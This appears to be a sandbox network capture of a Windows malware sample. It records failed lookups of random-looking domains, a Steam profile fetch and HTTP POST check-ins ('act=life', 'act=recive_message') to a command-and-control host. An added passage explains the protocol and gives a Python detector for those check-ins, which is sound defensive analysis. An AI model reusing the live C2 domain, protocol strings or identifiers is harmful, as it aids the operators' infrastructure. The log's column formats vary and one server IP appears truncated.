                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:13.331264973 CET49708443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:13.331296921 CET44349708172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:14.544581890 CET44349708172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:14.544670105 CET49708443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:14.546017885 CET49708443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:14.546034098 CET44349708172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:14.546292067 CET44349708172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:14.547377110 CET49708443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:14.547482967 CET49708443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:14.547528028 CET44349708172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:14.547585011 CET49708443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:14.591350079 CET44349708172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:15.406893969 CET44349708172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:15.406982899 CET44349708172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:15.407098055 CET49708443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:15.407341003 CET49708443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:15.407377005 CET44349708172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:15.602843046 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:15.602890015 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:15.602981091 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:15.603291035 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:15.603303909 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:16.862751961 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:16.862818003 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:16.864403009 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:16.864415884 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:16.864666939 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:16.865936041 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:16.866067886 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:16.866101980 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:16.866153955 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:16.866162062 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:17.808245897 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:17.808355093 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:17.808418036 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:17.808521986 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:17.808543921 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:18.140233994 CET49710443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:18.140309095 CET44349710172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:18.140425920 CET49710443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:18.140702963 CET49710443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:18.140733957 CET44349710172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:19.402048111 CET44349710172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:19.402132988 CET49710443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:19.403440952 CET49710443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:19.403455019 CET44349710172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:19.403697968 CET44349710172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:19.404912949 CET49710443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:19.404969931 CET49710443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:19.404980898 CET44349710172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:20.182389021 CET44349710172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:20.182498932 CET44349710172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:20.182638884 CET49710443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:20.182786942 CET49710443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:20.182811975 CET44349710172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:20.263494015 CET49713443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:20.263552904 CET44349713172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:20.263650894 CET49713443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:20.263946056 CET49713443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:20.263959885 CET44349713172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:21.574517012 CET44349713172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:21.574599981 CET49713443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:21.576083899 CET49713443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:21.576096058 CET44349713172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:21.576318979 CET44349713172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:21.577749014 CET49713443192.168.2.5172.67.157.254
Dec 28, 2024 22:05:21.577846050 CET  49713        443        192.168.2.5     172.67.157.254
Dec 28, 2024 22:05:21.577871084 CET  443          49713      172.67.157.254  192.168.2.5
Dec 28, 2024 22:05:22.401207924 CET  443          49713      172.67.157.254  192.168.2.5
Dec 28, 2024 22:05:22.401307106 CET  443          49713      172.67.157.254  192.168.2.5
Dec 28, 2024 22:05:22.401367903 CET  49713        443        192.168.2.5     172.67.157.254
Dec 28, 2024 22:05:22.401518106 CET  49713        443        192.168.2.5     172.67.157.254
Dec 28, 2024 22:05:22.401535988 CET  443          49713      172.67.157.254  192.168.2.5
Dec 28, 2024 22:05:22.491939068 CET  49716        443        192.168.2.5     172.67.157.254
Dec 28, 2024 22:05:22.491976023 CET  443          49716      172.67.157.254  192.168.2.5
Dec 28, 2024 22:05:22.492347956 CET  49716        443        192.168.2.5     172.67.157.254
Dec 28, 2024 22:05:22.492588043 CET  49716        443        192.168.2.5     172.67.157.254
Dec 28, 2024 22:05:22.492599964 CET  443          49716      172.67.157.254  192.168.2.5
Dec 28, 2024 22:05:23.705914021 CET  443          49716      172.67.157.254  192.168.2.5
Dec 28, 2024 22:05:23.705985069 CET  49716        443        192.168.2.5     172.67.157.254
Dec 28, 2024 22:05:23.727328062 CET  49716        443        192.168.2.5     172.67.157.254
Dec 28, 2024 22:05:23.727344990 CET  443          49716      172.67.157.254  192.168.2.5
Dec 28, 2024 22:05:23.727560043 CET  443          49716      172.67.157.254  192.168.2.5
Dec 28, 2024 22:05:23.785281897 CET  49716        443        192.168.2.5     172.67.157.254
Dec 28, 2024 22:05:23.839046955 CET  49716        443        192.168.2.5     172.67.157.254
Dec 28, 2024 22:05:23.839234114 CET  49716        443        192.168.2.5     172.67.157.254
Dec 28, 2024 22:05:23.839256048 CET  443          49716      172.67.157.254  192.168.2.5
Dec 28, 2024 22:05:24.619946957 CET  443          49716      172.67.157.254  192.168.2.5
Dec 28, 2024 22:05:24.620054007 CET  443          49716      172.67.157.254  192.168.2.5
Dec 28, 2024 22:05:24.620099068 CET  49716        443        192.168.2.5     172.67.157.254
Dec 28, 2024 22:05:24.620249987 CET  49716        443        192.168.2.5     172.67.157.254
Dec 28, 2024 22:05:24.620260000 CET  443          49716      172.67.157.254  192.168.2.5
Dec 28, 2024 22:05:24.620270967 CET  49716        443        192.168.2.5     172.67.157.254
Dec 28, 2024 22:05:24.620276928 CET  443          49716      172.67.157.254  192.168.2.5
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Dec 28, 2024 22:05:02.048746109 CET  65394        53         192.168.2.5     1.1.1.1
Dec 28, 2024 22:05:02.281878948 CET  53           65394      1.1.1.1         192.168.2.5
Dec 28, 2024 22:05:02.286295891 CET  54097        53         192.168.2.5     1.1.1.1
Dec 28, 2024 22:05:02.452183962 CET  53           54097      1.1.1.1         192.168.2.5
Dec 28, 2024 22:05:02.454947948 CET  51953        53         192.168.2.5     1.1.1.1
Dec 28, 2024 22:05:02.597414017 CET  53           51953      1.1.1.1         192.168.2.5
Dec 28, 2024 22:05:02.599823952 CET  65086        53         192.168.2.5     1.1.1.1
Dec 28, 2024 22:05:02.738172054 CET  53           65086      1.1.1.1         192.168.2.5
Dec 28, 2024 22:05:02.740771055 CET  50901        53         192.168.2.5     1.1.1.1
Dec 28, 2024 22:05:02.879699945 CET  53           50901      1.1.1.1         192.168.2.5
Dec 28, 2024 22:05:02.884238005 CET  65025        53         192.168.2.5     1.1.1.1
Dec 28, 2024 22:05:03.024915934 CET  53           65025      1.1.1.1         192.168.2.5
Dec 28, 2024 22:05:03.048763037 CET  54520        53         192.168.2.5     1.1.1.1
Dec 28, 2024 22:05:03.186151028 CET  53           54520      1.1.1.1         192.168.2.5
Dec 28, 2024 22:05:03.188045025 CET  52993        53         192.168.2.5     1.1.1.1
Dec 28, 2024 22:05:03.424678087 CET  53           52993      1.1.1.1         192.168.2.5
Dec 28, 2024 22:05:03.427191973 CET  57564        53         192.168.2.5     1.1.1.1
Dec 28, 2024 22:05:03.565334082 CET  53           57564      1.1.1.1         192.168.2.5
Dec 28, 2024 22:05:03.587410927 CET  63928        53         192.168.2.5     1.1.1.1
Dec 28, 2024 22:05:03.726411104 CET  53           63928      1.1.1.1         192.168.2.5
Dec 28, 2024 22:05:06.282953024 CET  56601        53         192.168.2.5     1.1.1.1
Dec 28, 2024 22:05:06.429471970 CET  53           56601      1.1.1.1         192.168.2.5
Timestamp                            Source IP       Dest IP      Trans ID  OP Code             Name                Type            Class        DNS over HTTPS
Dec 28, 2024 22:05:02.048746109 CET  192.168.2.5     1.1.1.1      0x8ad9    Standard query (0)  ingreem-eilish.biz  A (IP address)  IN (0x0001)  false
Dec 28, 2024 22:05:02.286295891 CET  192.168.2.5     1.1.1.1      0xfbc3    Standard query (0)  prisonyfork.buzz    A (IP address)  IN (0x0001)  false
Dec 28, 2024 22:05:02.454947948 CET  192.168.2.5     1.1.1.1      0x7c92    Standard query (0)  rebuildeso.buzz     A (IP address)  IN (0x0001)  false
Dec 28, 2024 22:05:02.599823952 CET  192.168.2.5     1.1.1.1      0xad33    Standard query (0)  scentniej.buzz      A (IP address)  IN (0x0001)  false
Dec 28, 2024 22:05:02.740771055 CET  192.168.2.5     1.1.1.1      0x249b    Standard query (0)  inherineau.buzz     A (IP address)  IN (0x0001)  false
Dec 28, 2024 22:05:02.884238005 CET  192.168.2.5     1.1.1.1      0xc476    Standard query (0)  screwamusresz.buzz  A (IP address)  IN (0x0001)  false
Dec 28, 2024 22:05:03.048763037 CET  192.168.2.5     1.1.1.1      0x765     Standard query (0)  appliacnesot.buzz   A (IP address)  IN (0x0001)  false
Dec 28, 2024 22:05:03.188045025 CET  192.168.2.5     1.1.1.1      0xfc17    Standard query (0)  cashfuzysao.buzz    A (IP address)  IN (0x0001)  false
Dec 28, 2024 22:05:03.427191973 CET  192.168.2.5     1.1.1.1      0xbb      Standard query (0)  hummskitnj.buzz     A (IP address)  IN (0x0001)  false
Dec 28, 2024 22:05:03.587410927 CET  192.168.2.5     1.1.1.1      0xaf86    Standard query (0)  steamcommunity.com  A (IP address)  IN (0x0001)  false
Dec 28, 2024 22:05:06.282953024 CET  192.168.2.5     1.1.1.1      0x7209    Standard query (0)  lev-tolstoi.com     A (IP address)  IN (0x0001)  false
Timestamp                            Source IP       Dest IP      Trans ID  Reply Code      Name                CName  Address         Type            Class        DNS over HTTPS
Dec 28, 2024 22:05:02.281878948 CET  1.1.1.1         192.168.2.5  0x8ad9    Name error (3)  ingreem-eilish.biz  none   none            A (IP address)  IN (0x0001)  false
Dec 28, 2024 22:05:02.452183962 CET  1.1.1.1         192.168.2.5  0xfbc3    Name error (3)  prisonyfork.buzz    none   none            A (IP address)  IN (0x0001)  false
Dec 28, 2024 22:05:02.597414017 CET  1.1.1.1         192.168.2.5  0x7c92    Name error (3)  rebuildeso.buzz     none   none            A (IP address)  IN (0x0001)  false
Dec 28, 2024 22:05:02.738172054 CET  1.1.1.1         192.168.2.5  0xad33    Name error (3)  scentniej.buzz      none   none            A (IP address)  IN (0x0001)  false
Dec 28, 2024 22:05:02.879699945 CET  1.1.1.1         192.168.2.5  0x249b    Name error (3)  inherineau.buzz     none   none            A (IP address)  IN (0x0001)  false
Dec 28, 2024 22:05:03.024915934 CET  1.1.1.1         192.168.2.5  0xc476    Name error (3)  screwamusresz.buzz  none   none            A (IP address)  IN (0x0001)  false
Dec 28, 2024 22:05:03.186151028 CET  1.1.1.1         192.168.2.5  0x765     Name error (3)  appliacnesot.buzz   none   none            A (IP address)  IN (0x0001)  false
Dec 28, 2024 22:05:03.424678087 CET  1.1.1.1         192.168.2.5  0xfc17    Name error (3)  cashfuzysao.buzz    none   none            A (IP address)  IN (0x0001)  false
Dec 28, 2024 22:05:03.565334082 CET  1.1.1.1         192.168.2.5  0xbb      Name error (3)  hummskitnj.buzz     none   none            A (IP address)  IN (0x0001)  false
Dec 28, 2024 22:05:03.726411104 CET  1.1.1.1         192.168.2.5  0xaf86    No error (0)    steamcommunity.com         23.55.153.106   A (IP address)  IN (0x0001)  false
Dec 28, 2024 22:05:06.429471970 CET  1.1.1.1         192.168.2.5  0x7209    No error (0)    lev-tolstoi.com            172.67.157.254  A (IP address)  IN (0x0001)  false
Dec 28, 2024 22:05:06.429471970 CET  1.1.1.1         192.168.2.5  0x7209    No error (0)    lev-tolstoi.com            104.21.66.86    A (IP address)  IN (0x0001)  false
• steamcommunity.com
• lev-tolstoi.com
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49704        23.55.153.106   443               5772  C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-28 21:05:05 UTC  219                OUT
    GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
2024-12-28 21:05:06 UTC  1905               IN
    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache
    Date: Sat, 28 Dec 2024 21:05:05 GMT
    Content-Length: 35121
    Connection: close
    Set-Cookie: sessionid=4c1bdccd71786aa257e88386; Path=/; Secure; SameSite=None
    Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-28 21:05:06 UTC  14479              IN
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-28 21:05:06 UTC  10097              IN
    Data Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
    Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-28 21:05:06 UTC  10545              IN
    Data Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                                Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 172.67.157.25 | 443 | 5772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-28 21:05:07 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: lev-tolstoi.com
2024-12-28 21:05:07 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-28 21:05:08 UTC | 1123 | IN | HTTP/1.1 200 OK
Date: Sat, 28 Dec 2024 21:05:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=8ithog9sh5p9opd1oc2sira1cl; expires=Wed, 23 Apr 2025 14:51:47 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GuPUmaMzttCCUOT%2FWYg8nEpA0xc8pcDqXH9%2BC2daSYLB78esXAB%2BQPixrkqyCn7PJAZ2L5JKmVhryQdC7dL260HK28E4ehWJbrLtKtrhIi0siTSQVSePx8y4UhnqAbGV4ik%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f9481b92ffb43d7-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1773&min_rtt=1766&rtt_var=677&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1600000&cwnd=208&unsent_bytes=0&cid=2af7491308612902&ts=785&x=0"
2024-12-28 21:05:08 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-28 21:05:08 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
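The two sessions to lev-tolstoi.com (the one above and the one that follows) show the same shape: a form-encoded POST to /api whose body starts with an act= parameter, an 8-byte act=life body answered with a chunked "ok", and then act=recive_message with ver, lid and j parameters answered with a large chunked reply. The ASCII column renders the first reply as "2ok" and "0" because it drops the CR/LF bytes; the raw bytes 32 0d 0a 6f 6b 0d 0a and 30 0d 0a 0d 0a are one 2-byte chunk "ok" followed by the terminating zero-length chunk. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it classifies POST bodies against the act values seen here, pulls out lid/ver/j for triage, and reassembles chunked replies. The function names, the benign intranet.example request used as a negative control, and the small constructed byte strings are assumptions of this example; the two matching bodies are copied from the captures.

```python
"""Added example (not part of the Joe Sandbox report, not the sample's code):
flag form-encoded POST bodies matching the /api check-in pattern captured in
the report and reassemble Transfer-Encoding: chunked replies."""
from urllib.parse import parse_qs

# 'act' values observed in the captured request bodies. "recive_message" is the
# spelling the traffic actually uses; do not "correct" it or the match breaks.
C2_ACTS = {"life", "recive_message"}

# Constructed sample: the first two bodies are copied from sessions 1 and 2 of
# the report; the third is a benign form post added as a negative control.
SAMPLE_POSTS = [
    ("lev-tolstoi.com", "/api", "act=life"),
    ("lev-tolstoi.com", "/api",
     "act=recive_message&ver=4.0&lid=HpOoIh--5defa06fc6ab"
     "&j=b9abc76ce53b6fc3a03566f8f764f5ea"),
    ("intranet.example", "/login", "user=alice&pass=secret"),  # constructed
]


def classify_post(host, path, body):
    """Return a triage dict for a body whose act= value is a known C2 action,
    or None for any other body (missing act, unknown act, not form-encoded)."""
    params = parse_qs(body, keep_blank_values=True)
    act = params.get("act", [None])[0]
    if act not in C2_ACTS:
        return None

    def first(key):
        return params.get(key, [None])[0]

    return {"host": host, "path": path, "act": act,
            "ver": first("ver"), "lid": first("lid"), "j": first("j")}


def scan(posts):
    """Run classify_post over (host, path, body) tuples, keeping the hits."""
    return [hit for hit in (classify_post(*p) for p in posts) if hit]


def first_chunk_size(raw):
    """Size announced by the first chunk header; works on a truncated capture
    where the chunk body itself is incomplete (as for the session 2 reply)."""
    eol = raw.find(b"\r\n")
    if eol < 0:
        raise ValueError("no chunk header")
    return int(raw[:eol].split(b";")[0], 16)  # drop any chunk extension


def dechunk(raw):
    """Reassemble a chunked body: repeated '<hex size>\\r\\n<data>\\r\\n',
    ended by a zero-size chunk. Raises ValueError on a truncated stream
    instead of returning a partial body."""
    out, pos = bytearray(), 0
    while True:
        eol = raw.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("truncated chunk header")
        size = int(raw[pos:eol].split(b";")[0], 16)
        pos = eol + 2
        if size == 0:
            return bytes(out)
        if pos + size + 2 > len(raw):
            raise ValueError("truncated chunk data")
        out += raw[pos:pos + size]
        pos += size + 2  # skip the data and its trailing CRLF


if __name__ == "__main__":
    for hit in scan(SAMPLE_POSTS):
        print(hit)
    # Session 1 reply bytes as captured: 32 0d 0a 6f 6b 0d 0a, 30 0d 0a 0d 0a
    print(dechunk(b"2\r\nok\r\n0\r\n\r\n"))
    # Session 2 reply begins "2d8a\r\n", i.e. an 11658-byte chunk
    print(first_chunk_size(b"2d8a\r\nCu4QM7KhyXTnRiPaJkFNXzxqVrHvJcPkpd1FMBOu5+Bx"))
```

The act= allow-list is deliberately narrow: it catches exactly the two actions this capture shows and nothing else, so extend C2_ACTS only from traffic you have observed. Matching on the body rather than the host means a rotated domain still triggers, while the returned lid and j values give the analyst something to pivot on. Note that the session 2 reply header 2d8a announces 11658 bytes, far more than the fragments reproduced in the report, so dechunk() refuses that truncated stream rather than silently returning a prefix.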


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49706 | 172.67.157.25 | 443 | 5772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-28 21:05:09 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 86
Host: lev-tolstoi.com
2024-12-28 21:05:09 UTC | 86 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 35 64 65 66 61 30 36 66 63 36 61 62 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--5defa06fc6ab&j=b9abc76ce53b6fc3a03566f8f764f5ea
2024-12-28 21:05:10 UTC | 1119 | IN | HTTP/1.1 200 OK
Date: Sat, 28 Dec 2024 21:05:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
